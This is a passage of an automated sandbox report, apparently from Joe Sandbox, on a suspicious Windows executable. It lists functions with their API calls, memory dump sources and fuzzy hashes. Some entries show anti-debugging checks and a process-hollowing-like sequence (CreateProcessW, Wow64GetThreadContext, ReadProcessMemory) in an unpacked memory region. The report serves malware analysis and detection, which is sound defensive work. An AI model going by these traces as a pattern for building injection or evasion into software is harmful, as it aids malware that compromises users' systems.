                            • Instruction Fuzzy Hash: 273193B1600A06AFC714EF68C8D1E69F3E9FF493207558229E569CB691DF70E861CB90
                            Function 00083682 Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                            Download Yara Rule
                            APIs
                            • IsThemeActive.UXTHEME ref: 000836E6
                              • Part of subcall function 000A2025: __lock.LIBCMT ref: 000A202B
                              • Part of subcall function 000832DE: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 000832F6
                              • Part of subcall function 000832DE: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0008330B
                              • Part of subcall function 0008374E: GetCurrentDirectoryW.KERNEL32(00000104,?,00000000,00000001), ref: 0008376D
                              • Part of subcall function 0008374E: IsDebuggerPresent.KERNEL32(?,?), ref: 0008377F
                              • Part of subcall function 0008374E: GetFullPathNameW.KERNEL32(C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe,00000104,?,00141120,C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe,00141124,?,?), ref: 000837EE
                              • Part of subcall function 0008374E: SetCurrentDirectoryW.KERNEL32(?), ref: 00083860
                            • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00083726
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme__lock
                            • String ID:
                            • API String ID: 924797094-0
                            • Opcode ID: b0c2f3dd29e1ecdc8a0e93df4d237bb85234ed19b141f8a868af34dfcfd8984e
                            • Instruction ID: 51a6c5fc89e988699c1886f918a52f9c50dfcc2902191ec0c7ed28b9314a66d9
                            • Opcode Fuzzy Hash: b0c2f3dd29e1ecdc8a0e93df4d237bb85234ed19b141f8a868af34dfcfd8984e
                            • Instruction Fuzzy Hash: 73118CB5908345ABC710EFA9EC4595ABBF8FBC5710F00451EF494876B2DBB09AC4CB92
                            Function 000AF782 Relevance: 3.1, APIs: 2, Instructions: 52COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • ___lock_fhandle.LIBCMT ref: 000AF7D9
                            • __close_nolock.LIBCMT ref: 000AF7F2
                              • Part of subcall function 000A886A: __getptd_noexit.LIBCMT ref: 000A886A
                              • Part of subcall function 000A889E: __getptd_noexit.LIBCMT ref: 000A889E
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: __getptd_noexit$___lock_fhandle__close_nolock
                            • String ID:
                            • API String ID: 1046115767-0
                            • Opcode ID: 29b81e2d44dcb0cafdb920df5e83ebc5e6974a5c5baf1910df646e1b551e9385
                            • Instruction ID: 5d5fc1e789c480ff2d89d5b6e6312b9b9556cbdf1e60e03a5ed80e0955bf01a3
                            • Opcode Fuzzy Hash: 29b81e2d44dcb0cafdb920df5e83ebc5e6974a5c5baf1910df646e1b551e9385
                            • Instruction Fuzzy Hash: F3117C3290A6129ED7217FE4D8463AC7AA06F43331F668260E5745B1E3CFBC594087A1
                            Function 000A010A Relevance: 3.0, APIs: 2, Instructions: 43COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 000A45EC: __FF_MSGBANNER.LIBCMT ref: 000A4603
                              • Part of subcall function 000A45EC: __NMSG_WRITE.LIBCMT ref: 000A460A
                              • Part of subcall function 000A45EC: RtlAllocateHeap.NTDLL(00A00000,00000000,00000001,?,?,?,?,000A0127,?,0008125D,00000058,?,?), ref: 000A462F
                            • std::exception::exception.LIBCMT ref: 000A013E
                            • __CxxThrowException@8.LIBCMT ref: 000A0153
                              • Part of subcall function 000A7495: RaiseException.KERNEL32(?,?,0008125D,00136598,?,?,?,000A0158,0008125D,00136598,?,00000001), ref: 000A74E6
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                            • String ID:
                            • API String ID: 3902256705-0
                            • Opcode ID: 2b477296e01f96006ead373f8e6cf8c0fbd10f735940b3341076abd8a989f226
                            • Instruction ID: 278a9d2bea6fbea14a81f33feaf14dbbc27aea04f0ff4400fe8c036d45b053db
                            • Opcode Fuzzy Hash: 2b477296e01f96006ead373f8e6cf8c0fbd10f735940b3341076abd8a989f226
                            • Instruction Fuzzy Hash: 9AF0C83910420DA6CB15ABE8DD029DEB7EC9F07350F104429F908A21C3DBB0868096A5
                            Function 000A4274 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                              • Part of subcall function 000A889E: __getptd_noexit.LIBCMT ref: 000A889E
                            • __lock_file.LIBCMT ref: 000A42B9
                              • Part of subcall function 000A5A9F: __lock.LIBCMT ref: 000A5AC2
                            • __fclose_nolock.LIBCMT ref: 000A42C4
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                            • String ID:
                            • API String ID: 2800547568-0
                            • Opcode ID: dd97f3ce7f7d31601fb3d09b8c71ab81796967e2efb2a5fa8375700d6742245d
                            • Instruction ID: 01ad9213740fa0116ee2f960715390f9bf5baa07efbfcf02f74789887a1ac8d1
                            • Opcode Fuzzy Hash: dd97f3ce7f7d31601fb3d09b8c71ab81796967e2efb2a5fa8375700d6742245d
                            • Instruction Fuzzy Hash: 38F090359056049AD720ABF58C027AE7BD06FC3334FA58219B8249B1C3CBBC89019B51
                            Function 00A50C45 Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                            Download Yara Rule
                            APIs
                            • CreateProcessW.KERNEL32(?,00000000), ref: 00A51403
                            • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00A51499
                            • ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00A514BB
                            Memory Dump Source
                            • Source File: 00000000.00000002.2090155966.0000000000A4F000.00000040.00000020.00020000.00000000.sdmp, Offset: 00A4F000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_a4f000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Process$ContextCreateMemoryReadThreadWow64
                            • String ID:
                            • API String ID: 2438371351-0
                            • Opcode ID: 935c44ad8318b3af66d252774f477c9026677184fbf87e93bc0843909b837ee7
                            • Instruction ID: 2f50cfe2d5ccc1695616ae37d35a398dceb2593e290cbe12c133b2157023f9f4
                            • Opcode Fuzzy Hash: 935c44ad8318b3af66d252774f477c9026677184fbf87e93bc0843909b837ee7
                            • Instruction Fuzzy Hash: 1C12EC20E24658C6EB24DF64D8507DEB232FF68301F1090E9910DEB7A5E77A4F85CB5A
                            Function 0009F92C Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: ProtectVirtual
                            • String ID:
                            • API String ID: 544645111-0
                            • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                            • Instruction ID: b8e5fe03e6af98edc19456810fdb64137f6b9a462bb813502b7a96c90d45891d
                            • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                            • Instruction Fuzzy Hash: 8731B570A00106AFCB58DF58D480A6DFBA5FB49350B6486A5E449CB255DB31EDC1EBD0
                            Function 000FAA5A Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: ClearVariant
                            • String ID:
                            • API String ID: 1473721057-0
                            • Opcode ID: e5f41a3f25d63fe6ed7c7293d2a84de2a8abd0d6d69390c5af0e299f37d4f784
                            • Instruction ID: b7d678a11f48a111f629e5376f63888d0c18c348a4be994fd4f7e371d98ef848
                            • Opcode Fuzzy Hash: e5f41a3f25d63fe6ed7c7293d2a84de2a8abd0d6d69390c5af0e299f37d4f784
                            • Instruction Fuzzy Hash: BA415E70608651CFDB24CF18C444B6ABBE1BF45308F19856CE9994B762C372E885DF52
                            Function 0008BD71 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: _memmove
                            • String ID:
                            • API String ID: 4104443479-0
                            • Opcode ID: 9addedbf9276ae0f3aefa9ba152078eed992e84230754c7c9cd45e7fcfb81d2d
                            • Instruction ID: 0c7a4ca798a438d86103e3c5bd238ab81a46285a754b382c19ee31940be93eda
                            • Opcode Fuzzy Hash: 9addedbf9276ae0f3aefa9ba152078eed992e84230754c7c9cd45e7fcfb81d2d
                            • Instruction Fuzzy Hash: 2921F172600A09FBCB249F21EC417BD7BB4FB14390F21842AE586C5492EF30C5D0E715
                            Function 0008D805 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: _memmove
                            • String ID:
                            • API String ID: 4104443479-0
                            • Opcode ID: 9e0dbd13afd0d015ac2a562479df0c6f82842987197f50a2e5fbad89f4896f03
                            • Instruction ID: e6150924badade9761f96e461b56ecaadf9106796afd7aedba1c79d964661753
                            • Opcode Fuzzy Hash: 9e0dbd13afd0d015ac2a562479df0c6f82842987197f50a2e5fbad89f4896f03
                            • Instruction Fuzzy Hash: E3115E75600606DFD724DF28D481956B7F9FF49320B20C52EE88ECB662EB32E841CB50
                            Function 00083F9B Relevance: 1.6, APIs: 1, Instructions: 63libraryCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00083F5D: FreeLibrary.KERNEL32(00000000,?), ref: 00083F90
                              • Part of subcall function 000A4129: __wfsopen.LIBCMT ref: 000A4134
                            • LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,000834E2,?,00000001), ref: 00083FCD
                              • Part of subcall function 00083E78: FreeLibrary.KERNEL32(00000000), ref: 00083EAB
                              • Part of subcall function 00084010: _memmove.LIBCMT ref: 0008405A
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Library$Free$Load__wfsopen_memmove
                            • String ID:
                            • API String ID: 1396898556-0
                            • Opcode ID: 2da4aa6aa7ee93beb875a87d9be819c5aa0011b831f81d3bbda6a79454641931
                            • Instruction ID: cb857ea4386d73203572dceb2a266fb525a371512791c346aeaf04ca690ab7e4
                            • Opcode Fuzzy Hash: 2da4aa6aa7ee93beb875a87d9be819c5aa0011b831f81d3bbda6a79454641931
                            • Instruction Fuzzy Hash: CE11A731600216AACF14BB64DC16FDE76A5AF90B40F204429F581E71C2EFB09A459B50
                            Function 000FAB2A Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: ClearVariant
                            • String ID:
                            • API String ID: 1473721057-0
                            • Opcode ID: 53d1bf9de73b062b3e01921e97696e8951b6a516c3712ff420c21efc44ca0c18
                            • Instruction ID: 159ebf3172f0d4233b69605dc80b0cee6e97aa18799dac67c734e35fb9b44607
                            • Opcode Fuzzy Hash: 53d1bf9de73b062b3e01921e97696e8951b6a516c3712ff420c21efc44ca0c18
                            • Instruction Fuzzy Hash: A1216970208605CFDB24DF68C444F6ABBE1BF89304F14496CF99547622C731E885DF52
                            Function 000ABD14 Relevance: 1.6, APIs: 1, Instructions: 56COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • ___lock_fhandle.LIBCMT ref: 000ABD73
                              • Part of subcall function 000A886A: __getptd_noexit.LIBCMT ref: 000A886A
                              • Part of subcall function 000A889E: __getptd_noexit.LIBCMT ref: 000A889E
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: __getptd_noexit$___lock_fhandle
                            • String ID:
                            • API String ID: 1144279405-0
                            • Opcode ID: 02b65f9f5f13a2401efc89ec10b0fefe9690420cdc813194326434a1016ce123
                            • Instruction ID: 7561cd45d2a4d2334b108c69d5c2c85ed96461e34ecf7197810cf6281b2e3d65
                            • Opcode Fuzzy Hash: 02b65f9f5f13a2401efc89ec10b0fefe9690420cdc813194326434a1016ce123
                            • Instruction Fuzzy Hash: 391191728056149FD7227FE4CC463AC7BA06F43335F568650E5641F1E3EFB889408B61
                            Function 000A373E Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                            Download Yara Rule
                            APIs
                            • __lock_file.LIBCMT ref: 000A377D
                              • Part of subcall function 000A889E: __getptd_noexit.LIBCMT ref: 000A889E
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: __getptd_noexit__lock_file
                            • String ID:
                            • API String ID: 2597487223-0
                            • Opcode ID: 854c5a7250acba62335c6d4d10d1145dc6f195f863b84f7270f15bf72e22d488
                            • Instruction ID: 27a6fad836a6442c235e1ff21efcc6fc37a6f93cc7a8a2c22262fcab1715c8be
                            • Opcode Fuzzy Hash: 854c5a7250acba62335c6d4d10d1145dc6f195f863b84f7270f15bf72e22d488
                            • Instruction Fuzzy Hash: 55F090B1909215EBDF71AFF48C077DE76A0BF02320F148514F8149A192DB798B50DB91
                            Function 00083E39 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                            Download Yara Rule
                            APIs
                            • FreeLibrary.KERNEL32(?,?,?,?,?,000834E2,?,00000001), ref: 00083E6D
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: FreeLibrary
                            • String ID:
                            • API String ID: 3664257935-0
                            • Opcode ID: 9b1cf45faaf3ff06b54f92297a363452c4f6c105b88cd8573dbd173c0d9ab8df
                            • Instruction ID: f46fc2e2c73bd492c3873c4293045afab8175318efdf90c1665bbea88e450acb
                            • Opcode Fuzzy Hash: 9b1cf45faaf3ff06b54f92297a363452c4f6c105b88cd8573dbd173c0d9ab8df
                            • Instruction Fuzzy Hash: 58F03971101741CFCB34AF64D490857BBE0BF54B193248A7EE1D682A61C7719944DF50
                            Function 000A4129 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: __wfsopen
                            • String ID:
                            • API String ID: 197181222-0
                            • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                            • Instruction ID: 0d0cc9cd50f0645dfb84305542bd40fe441c0d22c8c641c34493046515394ad5
                            • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                            • Instruction Fuzzy Hash: E8B0927644030C77CE412E82EC02E893B199B91660F008020FB0C1C162A6B3AAA09A89
                            Function 00A51C44 Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.2090155966.0000000000A4F000.00000040.00000020.00020000.00000000.sdmp, Offset: 00A4F000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_a4f000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Sleep
                            • String ID:
                            • API String ID: 3472027048-0
                            • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                            • Instruction ID: f8ce5c1855e40bc63746c0ac0448dd087a12ec189ee4c0c339b0603307f9c2f2
                            • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                            • Instruction Fuzzy Hash: 29E09A7498010DAFDB00DFA4D6496ED7BB4EF04302F1006A5FD0596680DA719E548A62
                            Function 00A51C48 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.2090155966.0000000000A4F000.00000040.00000020.00020000.00000000.sdmp, Offset: 00A4F000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_a4f000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Sleep
                            • String ID:
                            • API String ID: 3472027048-0
                            • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                            • Instruction ID: 70a2c8ee141c10ee7ab9b31abebfe65e9d2255eaa894416a5ab84375cfdca1fd
                            • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                            • Instruction Fuzzy Hash: F3E0BF7498010D9FDB00DFB4D6496AD7BB4EF04302F1002A5FD0192280D6719D508A62

                            Non-executed Functions

                            Function 000EF5D0 Relevance: 74.1, APIs: 40, Strings: 2, Instructions: 630windowkeyboardCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0009AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0009AF8E
                            • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?,?), ref: 000EF64E
                            • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 000EF6AD
                            • GetWindowLongW.USER32(?,000000F0), ref: 000EF6EA
                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 000EF711
                            • SendMessageW.USER32 ref: 000EF737
                            • _wcsncpy.LIBCMT ref: 000EF7A3
                            • GetKeyState.USER32(00000011), ref: 000EF7C4
                            • GetKeyState.USER32(00000009), ref: 000EF7D1
                            • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 000EF7E7
                            • GetKeyState.USER32(00000010), ref: 000EF7F1
                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 000EF820
                            • SendMessageW.USER32 ref: 000EF843
                            • SendMessageW.USER32(?,00001030,?,000EDE69), ref: 000EF940
                            • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?,?), ref: 000EF956
                            • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 000EF967
                            • SetCapture.USER32(?), ref: 000EF970
                            • ClientToScreen.USER32(?,?), ref: 000EF9D4
                            • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 000EF9E0
                            • InvalidateRect.USER32(?,00000000,00000001,?,?,?,?), ref: 000EF9FA
                            • ReleaseCapture.USER32 ref: 000EFA05
                            • GetCursorPos.USER32(?), ref: 000EFA3A
                            • ScreenToClient.USER32(?,?), ref: 000EFA47
                            • SendMessageW.USER32(?,00001012,00000000,?), ref: 000EFAA9
                            • SendMessageW.USER32 ref: 000EFAD3
                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 000EFB12
                            • SendMessageW.USER32 ref: 000EFB3D
                            • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 000EFB55
                            • SendMessageW.USER32(?,0000110B,00000009,?), ref: 000EFB60
                            • GetCursorPos.USER32(?), ref: 000EFB81
                            • ScreenToClient.USER32(?,?), ref: 000EFB8E
                            • GetParent.USER32(?), ref: 000EFBAA
                            • SendMessageW.USER32(?,00001012,00000000,?), ref: 000EFC10
                            • SendMessageW.USER32 ref: 000EFC40
                            • ClientToScreen.USER32(?,?), ref: 000EFC96
                            • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 000EFCC2
                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 000EFCEA
